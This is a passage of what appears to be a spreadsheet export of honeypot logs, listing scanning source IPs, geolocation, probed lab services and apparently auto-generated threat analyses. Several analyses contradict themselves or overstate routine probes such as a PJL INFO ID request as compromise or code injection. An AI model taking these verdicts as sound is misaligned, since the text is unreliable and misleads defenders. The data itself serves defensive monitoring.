amp;&amp;60370&amp;&amp;51794&amp;&amp;51600&amp;&amp;46562&amp;&amp;39008&amp;&amp;51492&amp;&amp;51742&amp;&amp;48188&amp;&amp;39956&amp;&amp;49471&amp;&amp;44040&amp;&amp;41906&amp;&amp;46306&amp;&amp;53250&amp;&amp;37458&amp;&amp;41838&amp;&amp;41377&amp;&amp;33147&amp;&amp;35968&amp;&amp;46442&amp;&amp;34495&amp;&amp;32850&amp;&amp;47176&amp;&amp;57206&amp;&amp;54831&amp;&amp;49069&amp;&amp;44361&amp;&amp;57681&amp;&amp;37218&amp;&amp;38411&amp;&amp;44619&amp;&amp;51424&amp;&amp;33678&amp;&amp;55112&amp;&amp;45582&amp;&amp;34585&amp;&amp;58172&amp;&amp;56898&amp;&amp;54188&amp;&amp;38385&amp;&amp;35688&amp;&amp;50801&amp;&amp;43133&amp;&amp;40151&amp;&amp;42232&amp;&amp;41644&amp;&amp;51400&amp;&amp;NA&amp;&amp;47069&amp;&amp;48093&amp;&amp;34863&amp;&amp;34012&amp;&amp;34020&amp;&amp;34028&amp;&amp;34032&amp;&amp;34036&amp;&amp;50232&amp;&amp;50248&amp;&amp;50252</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;GET&amp;&amp;POST&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '66.94.127.183:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '194.233.76.135:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:8d62:baf</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze activity. &amp;&amp; This log suggests that there was an attempt to initiate a TELNET connection, which could be a scanning or probing activity to identify open ports. This behavior is often indicative of reconnaissance efforts by malicious actors. The lack of any further activity may indicate the actor moved on to another target.</t>
  </si>
  <si>
    <t>There is no log data provided.</t>
  </si>
  <si>
    <t>3aac92ee5a54b35ef24cc5829e4fb11a</t>
  </si>
  <si>
    <t>190.106.100.166</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;16718&amp;&amp;1433&amp;&amp;57705&amp;&amp;45031&amp;&amp;NA</t>
  </si>
  <si>
    <t>X</t>
  </si>
  <si>
    <t>Cordoba</t>
  </si>
  <si>
    <t>Departamento de Capital</t>
  </si>
  <si>
    <t>Córdoba</t>
  </si>
  <si>
    <t>3860259</t>
  </si>
  <si>
    <t>-31.4135</t>
  </si>
  <si>
    <t>-64.1811</t>
  </si>
  <si>
    <t>28026</t>
  </si>
  <si>
    <t>Grape S.A.</t>
  </si>
  <si>
    <t>Grape S.A</t>
  </si>
  <si>
    <t>::ffff:be6a:64a6</t>
  </si>
  <si>
    <t>There is insufficient data to provide an analysis of possible malicious activity. &amp;&amp; This log indicates that no malicious SQL injection attempt was made through this service as MSSQL is reported as Not Available (NA). The system monitored for potential SQL injection attacks did not record any suspicious activity. No actual attack was detected on the SQL service. &amp;&amp; No log data available to analyze.</t>
  </si>
  <si>
    <t>7684b21e764173e46505d35d62985c5d</t>
  </si>
  <si>
    <t>116.75.233.181</t>
  </si>
  <si>
    <t>HATHWAY-NET-AP</t>
  </si>
  <si>
    <t>::ffff:744b:e9b5</t>
  </si>
  <si>
    <t>505056d60c2e0957d35501f648cd3343</t>
  </si>
  <si>
    <t>211.48.122.102</t>
  </si>
  <si>
    <t>::ffff:d330:7a66</t>
  </si>
  <si>
    <t>28226dc07013dd8a2c21566bbd187d72</t>
  </si>
  <si>
    <t>180.191.255.192</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>Cavite</t>
  </si>
  <si>
    <t>Tulay</t>
  </si>
  <si>
    <t>1680855</t>
  </si>
  <si>
    <t>14.2697</t>
  </si>
  <si>
    <t>120.769</t>
  </si>
  <si>
    <t>GLOBE-MOBILE-5TH-GEN-AS</t>
  </si>
  <si>
    <t>::ffff:b4bf:ffc0</t>
  </si>
  <si>
    <t>cf041a6f6b8acba50d67539d3d015a55</t>
  </si>
  <si>
    <t>205.210.31.71</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_HTTP_H20&amp;&amp;SMA-LAB_SIP_H18&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_SIP_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;80&amp;&amp;NA&amp;&amp;143&amp;&amp;3306&amp;&amp;445&amp;&amp;6379&amp;&amp;23&amp;&amp;5432&amp;&amp;161&amp;&amp;110&amp;&amp;1433&amp;&amp;389&amp;&amp;1521&amp;&amp;19553&amp;&amp;6595&amp;&amp;3389&amp;&amp;1080&amp;&amp;9100&amp;&amp;5900&amp;&amp;53851&amp;&amp;443&amp;&amp;54722&amp;&amp;51733&amp;&amp;6667&amp;&amp;52354&amp;&amp;62062&amp;&amp;54193&amp;&amp;53766&amp;&amp;53985&amp;&amp;57026</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET&amp;&amp;stshash&amp;&amp;request&amp;&amp;query&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,57810)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,57820)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,57830)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xjGkhyWSt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SnEAvt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=afnmqd'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OuzApCZVi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eqAJuG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hURqUE'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fZQqzscVP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IQeRZT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aKWIeF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=IcMLYpReN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jgIYup'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hZMClE'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,62728)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,62738)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.71,62744)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OxuhAhSNc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mmTQQQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TgRJdF'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SIP:{'accept': 'text/plain', 'call-id': '0493851846@10.128.0.71', 'contact': 'sip:QVrVjHuS@10.128.0.71:51369', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:psthLnEz@10.128.0.71:51369;tag=50176750', 'max-forwards': '20', 'to': 'sip:LBCOfJyo@203.29.241.98', 'user-agent': 'CotPXoMf', 'via': 'SIP/2.0/UDP 10.128.0.71:51369;branch=xnwVgR.3177477512;received=205.210.31.71;rport;alias'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gETlEznxa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iKemqR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nOnkNq'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f47</t>
  </si>
  <si>
    <t>There is insufficient information to analyze, as the log data field is empty or contains "NA". &amp;&amp; No activity detected for LDAP service. No malicious login attempts were made. The service was idle during this time period. &amp;&amp; This indicates an attempt to access or modify file permissions on a system, potentially indicating malicious intent to escalate privileges or gain unauthorized control. The actor is trying to alter system settings. Access attempts are being made. &amp;&amp; Possible attempt to exploit a service, attempting to gain unauthorized access, possibly trying to inject malicious code. Data was requested from an unknown source with no identification. Unknown entity is probing system for potential vulnerabilities. &amp;&amp; An unknown entity has attempted to connect to the PJL (Printer Job Language) service, suggesting a potential scanning or probing activity.
A malicious actor may be attempting to exploit vulnerabilities in this service for unauthorized access.
This connection attempt could also be a reconnaissance effort. &amp;&amp; No malicious activity detected, this is likely a normal system check or initialization message indicating no specific activity occurred. The log simply indicates that the service did not receive any data from PJL (Print Job Language). This could be due to a legitimate absence of print jobs being sent. &amp;&amp; The data indicates that a potential malicious actor is attempting to exploit a service by sending an incomplete or malformed request, specifically targeting a feature or plugin (PJL) with no apparent data sent, which could be indicative of a probing or reconnaissance attempt. This may suggest an attacker trying to identify vulnerabilities in the system. The lack of data sent raises suspicions about the true intentions of this activity. &amp;&amp; No malicious activity detected, service not accessed or requested. 
Unknown or null request submitted to system. 
Possible configuration or connection issue reported. &amp;&amp; This data suggests that an attacker is attempting to send printer job information, possibly as part of a larger malicious operation such as scanning or exploiting vulnerabilities related to printer functionality. The command appears to be legitimate but its presence in this context may indicate unwanted access or manipulation. It could also be part of a reconnaissance attempt. &amp;&amp; Possible malicious activity is an attempt to send printer settings information via a spooler service exploit. Malicious actor is probing for vulnerabilities in printer configuration and management systems. This could be a reconnaissance step before launching a more targeted attack. &amp;&amp; This log suggests an attempt to gather information about the system, possibly for further exploitation or reconnaissance. The command appears to be related to printer or printing settings. This activity may indicate a malicious actor probing the system's configuration. &amp;&amp; Possible malicious activity involves exploitation of printer protocol to gain unauthorized access and potentially execute commands remotely, which could lead to further system compromise or data theft, allowing attackers to elevate privileges. This may indicate a vulnerability in the network's print services being exploited by an attacker. The attackers can now issue various system commands through the compromised printer. &amp;&amp; This log indicates a printer-specific command, likely used for malicious purposes such as printing exploits or malicious data to a connected device. It suggests unauthorized access to a network resource. A potential security threat is being executed through this command. &amp;&amp; The attacker is sending a command to print information about the printer, likely as reconnaissance before exploiting it. This suggests an attempt to gather sensitive information from the printer's system. The command itself appears to be designed to elicit printer-specific data. &amp;&amp; Possible malicious activity: An attacker is attempting to gather printer configuration information, likely as part of a reconnaissance or exploitation attempt. This could be the first step in printing malicious documents or spreading malware through the printer. It may also be an attempt to exploit printer vulnerabilities. &amp;&amp; This log suggests an attempt to print job information, possibly to gather sensitive details about the system's printing capabilities and settings. The activity appears to be probing for vulnerabilities related to printer management. &amp;&amp; This log suggests an attempt to execute a malicious command related to printer settings or job manipulation, potentially for unauthorized access or data exfiltration. The nature of the command implies an effort to exploit printer functionality for nefarious purposes. This activity may be part of a larger attack to gain access or manipulate system resources. &amp;&amp; Possible malicious activity is unauthorized access to printer settings, likely an attempt to print sensitive information or exploit vulnerabilities in the printer's control interface for malicious purposes. The attacker is sending a command to retrieve identification and other information from the printer. This could be a reconnaissance step before more serious attacks. &amp;&amp; A printer is being probed or scanned for potential exploitation, possibly as part of a larger attack to install malware or gain unauthorized access. The activity suggests an attempt to identify and manipulate the printer's settings or functionality. This could be a precursor to more severe malicious actions. &amp;&amp; Malicious actor is sending printer job command to exploit vulnerabilities in print services. They are attempting to access and potentially take control of printing infrastructure. This could be a reconnaissance step for further attacks on the network. &amp;&amp; The data suggests an attempt to gather information about the system, possibly through a print job or similar mechanism. This could be indicative of reconnaissance or probing activity by an attacker. The command appears to be related to printer job settings. &amp;&amp; This data suggests a potential printer spool service exploitation attempt, where an attacker is attempting to inject malicious code by exploiting the PJL (Printer Job Language) command. This can be used for unauthorized access or control of the printer and possibly spread malware through the network. The attacker may be trying to gain access to the printer's internal systems. &amp;&amp; This suggests a connection attempt to VNC service was made but no data was sent or received. Malicious actors may use VNC for unauthorized access to systems. No activity was detected, implying the attempt might have been terminated prematurely. &amp;&amp; There is no connection attempt via Remote Desktop Protocol (RDP) to this monitored service. This suggests that an attacker may be trying to exploit RDP vulnerabilities or gain unauthorized access. However, the lack of a valid RDP connection attempt indicates potential probing or reconnaissance activity instead. &amp;&amp; No suspicious activity detected from TELNET service, but data is missing or unavailable for analysis.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Scanning Attempt &amp;&amp; Unknown Attack &amp;&amp; Port Scan &amp;&amp; Brute Force &amp;&amp; SYN Scanning &amp;&amp; VNC Scanning</t>
  </si>
  <si>
    <t>0fec6dd260ff9d42dada9baab3d9dfa9</t>
  </si>
  <si>
    <t>122.166.188.77</t>
  </si>
  <si>
    <t>Bharti Airtel Ltd.</t>
  </si>
  <si>
    <t>::ffff:7aa6:bc4d</t>
  </si>
  <si>
    <t>88a5d1a1a4ca1de48923bcabf29a9fb8</t>
  </si>
  <si>
    <t>190.196.249.144</t>
  </si>
  <si>
    <t>S</t>
  </si>
  <si>
    <t>Santa Fe</t>
  </si>
  <si>
    <t>Departamento de San Lorenzo</t>
  </si>
  <si>
    <t>Capitán Bermúdez</t>
  </si>
  <si>
    <t>3862738</t>
  </si>
  <si>
    <t>-32.8226</t>
  </si>
  <si>
    <t>-60.7185</t>
  </si>
  <si>
    <t>266702</t>
  </si>
  <si>
    <t>AS266702</t>
  </si>
  <si>
    <t>Megalink S.R.L</t>
  </si>
  <si>
    <t>Ciudad Global S.A</t>
  </si>
  <si>
    <t>::ffff:bec4:f990</t>
  </si>
  <si>
    <t>6bd88a7cf551d2836302accd8a4d736f</t>
  </si>
  <si>
    <t>120.57.171.157</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>MTNL Delhi</t>
  </si>
  <si>
    <t>::ffff:7839:ab9d</t>
  </si>
  <si>
    <t>ede28a2b4a9c82b005549826a6f15e5f</t>
  </si>
  <si>
    <t>106.51.241.127</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;55869&amp;&amp;55893</t>
  </si>
  <si>
    <t>Atria Convergence Technologies Pvt. Ltd.</t>
  </si>
  <si>
    <t>2011-03-24</t>
  </si>
  <si>
    <t>CABLELITE</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,56985)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,57557)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,50984)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,51614)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,53699)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,55803)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,56228)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,57352)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6a33:f17f</t>
  </si>
  <si>
    <t>The data suggests an attempted connection or probing for Microsoft SQL Server service, possibly a reconnaissance activity by a malicious entity to identify potential vulnerabilities. This could be the initial step of a larger attack or just a scanning attempt.</t>
  </si>
  <si>
    <t>e75667aa1f548fdc804c355cb77c554f</t>
  </si>
  <si>
    <t>117.241.183.62</t>
  </si>
  <si>
    <t>::ffff:75f1:b73e</t>
  </si>
  <si>
    <t>e176db8924508dd3f4f349cda8a72656</t>
  </si>
  <si>
    <t>45.164.177.203</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H6</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;NA&amp;&amp;23264</t>
  </si>
  <si>
    <t>Ubatuba</t>
  </si>
  <si>
    <t>3445847</t>
  </si>
  <si>
    <t>-23.4339</t>
  </si>
  <si>
    <t>-45.0711</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:2da4:b1cb</t>
  </si>
  <si>
    <t>4773d11d96f7e410eb4daf71bd6cbf25</t>
  </si>
  <si>
    <t>45.79.100.113</t>
  </si>
  <si>
    <t>NA&amp;&amp;prod-boron-us-west-90.li.binaryedge.ninja</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>9100&amp;&amp;23&amp;&amp;110&amp;&amp;5900&amp;&amp;3389&amp;&amp;40788&amp;&amp;NA&amp;&amp;143&amp;&amp;43170&amp;&amp;80</t>
  </si>
  <si>
    <t>Fremont</t>
  </si>
  <si>
    <t>94536</t>
  </si>
  <si>
    <t>37.5485</t>
  </si>
  <si>
    <t>-121.989</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.0_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'OPTIONS / HTTP/1.0_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'OPTIONS / RTSP/1.0_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': ' x1e x06x01  x01      x07versionx04bind  x10 x03'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'method': 'OPTIONS', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:2d4f:6471</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze activity.</t>
  </si>
  <si>
    <t>5d4f67243181d4201e9e40b5cafcb898</t>
  </si>
  <si>
    <t>120.57.213.186</t>
  </si>
  <si>
    <t>::ffff:7839:d5ba</t>
  </si>
  <si>
    <t>febe9af989baf7dc5b91c7f09dbff14a</t>
  </si>
  <si>
    <t>103.160.182.73</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>Kabupaten Bondowoso</t>
  </si>
  <si>
    <t>Tlogosari</t>
  </si>
  <si>
    <t>6829676</t>
  </si>
  <si>
    <t>-7.9993</t>
  </si>
  <si>
    <t>113.935</t>
  </si>
  <si>
    <t>150208</t>
  </si>
  <si>
    <t>PT Internusa Duta Makmur</t>
  </si>
  <si>
    <t>2022-08-24</t>
  </si>
  <si>
    <t>IDNIC-IDMNET-ID</t>
  </si>
  <si>
    <t>::ffff:67a0:b649</t>
  </si>
  <si>
    <t>beca627125f451ebdf9819fe0432958b</t>
  </si>
  <si>
    <t>189.57.191.214</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900&amp;&amp;40920&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>Ferraz de Vasconcelos</t>
  </si>
  <si>
    <t>3463422</t>
  </si>
  <si>
    <t>-23.5408</t>
  </si>
  <si>
    <t>-46.3686</t>
  </si>
  <si>
    <t>10429</t>
  </si>
  <si>
    <t>TELEFÔNICA BRASIL S.A</t>
  </si>
  <si>
    <t>Vivo</t>
  </si>
  <si>
    <t>TELEF�NICA BRASIL S.A</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,63492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,63583)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,58705)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,59039)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,62322)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,62595)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,56586)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,57369)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,58171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,65401)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,53233)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,54057)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,57677)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 